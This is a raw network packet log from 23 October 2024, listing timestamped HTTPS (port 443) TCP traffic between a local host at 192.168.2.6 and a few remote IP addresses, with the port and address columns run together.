                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146297932 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146389961 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146425009 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146440029 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146501064 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146508932 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146615982 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146680117 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146687984 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146778107 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146843910 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.146852016 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148081064 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148137093 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148144007 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148245096 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148300886 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.148308992 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152152061 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152252913 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152259111 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152286053 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152328968 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152328968 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152674913 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152745962 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152793884 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.152858973 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.153372049 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.153438091 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.193497896 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.193589926 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.197146893 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.197155952 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.200911045 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.201123953 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.201136112 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202127934 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202193975 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202577114 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202636003 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202831984 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.202838898 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230262995 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230350018 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230372906 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230458975 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230509043 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230519056 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230622053 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230679989 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.230689049 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.243805885 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.269982100 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.270067930 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.270539045 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.270625114 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.270857096 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.270920038 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.271214008 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.271279097 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.275496006 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.275506020 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.312274933 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.312360048 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.321177959 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.345527887 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.345750093 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.345809937 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.345820904 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.345971107 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.346019983 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.346030951 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358225107 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358298063 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358369112 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358398914 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358429909 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358686924 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358707905 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358716011 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358944893 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.358962059 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382715940 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382765055 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382792950 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382827044 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382826090 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382848024 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382873058 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382880926 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382924080 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.382930994 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.383121014 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.383167028 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.383173943 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.388845921 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.388923883 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.388967037 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389045954 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389087915 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389204979 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389220953 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389236927 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389267921 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389780998 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389862061 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389879942 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.389947891 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.396529913 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.396538973 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.424041033 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.424057007 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.430974007 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.431128025 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.443240881 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.473555088 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480696917 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480726004 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480775118 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480917931 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480977058 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.480984926 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.481008053 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.481025934 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.502485037 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.502552032 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.502648115 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.502650023 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.502695084 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.503350019 CEST49746443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.503371954 CEST44349746141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.506293058 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.506376982 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.506453037 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.506726980 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.506762028 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.507669926 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.507755995 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.507766962 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.507838011 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.507875919 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.509057999 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.509102106 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.509141922 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.509160042 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.509188890 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.521461964 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.546715021 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.546750069 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.546797037 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.551882982 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.575862885 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.575942039 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.575958014 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.576070070 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.576102972 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.576144934 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.576169968 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.605648041 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.605900049 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.605940104 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.606419086 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.606792927 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.606889963 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.606906891 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.614531040 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.615688086 CEST49748443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.615725040 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.616189003 CEST49748443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.616199970 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.617636919 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.618160963 CEST49749443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.618191957 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.618557930 CEST49749443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.618563890 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.621992111 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.622328997 CEST49751443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.622344017 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.622714996 CEST49751443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.622719049 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.625365019 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.625648022 CEST49752443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.625673056 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.625767946 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626007080 CEST49752443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626012087 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626197100 CEST49750443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626231909 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626605988 CEST49750443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.626616955 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627309084 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627381086 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627425909 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627446890 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627480984 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627645969 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.627660036 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.630045891 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.651335001 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.661926031 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.661962032 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.662009001 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.662339926 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.667872906 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691196918 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691360950 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691373110 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691404104 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691426039 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691433907 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.691461086 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.744138956 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746562958 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746575117 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746599913 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746644974 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746684074 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746704102 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.746745110 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748447895 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748512030 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748518944 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748564005 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748593092 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748617887 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.748708010 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754561901 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754714012 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754813910 CEST49748443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754836082 CEST49748443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754847050 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754857063 CEST49748443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.754863024 CEST4434974813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.756709099 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.756850004 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.757005930 CEST49749443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.757034063 CEST49749443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.757034063 CEST49749443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.757049084 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.757056952 CEST4434974913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.758028030 CEST49757443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.758073092 CEST4434975713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.758385897 CEST49757443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.758517981 CEST49757443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.758527994 CEST4434975713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.759033918 CEST49758443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.759068966 CEST4434975813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.759188890 CEST49758443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.759257078 CEST49758443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.759270906 CEST4434975813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762113094 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762661934 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762722015 CEST49751443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762749910 CEST49751443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762754917 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762763023 CEST49751443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.762767076 CEST4434975113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764503956 CEST49759443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764523029 CEST4434975913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764642000 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764691114 CEST49759443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764785051 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764853954 CEST49759443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764868021 CEST4434975913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764883995 CEST49752443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764925003 CEST49752443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764939070 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764947891 CEST49752443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.764954090 CEST4434975213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765225887 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765398026 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765518904 CEST49750443192.168.2.613.107.253.72
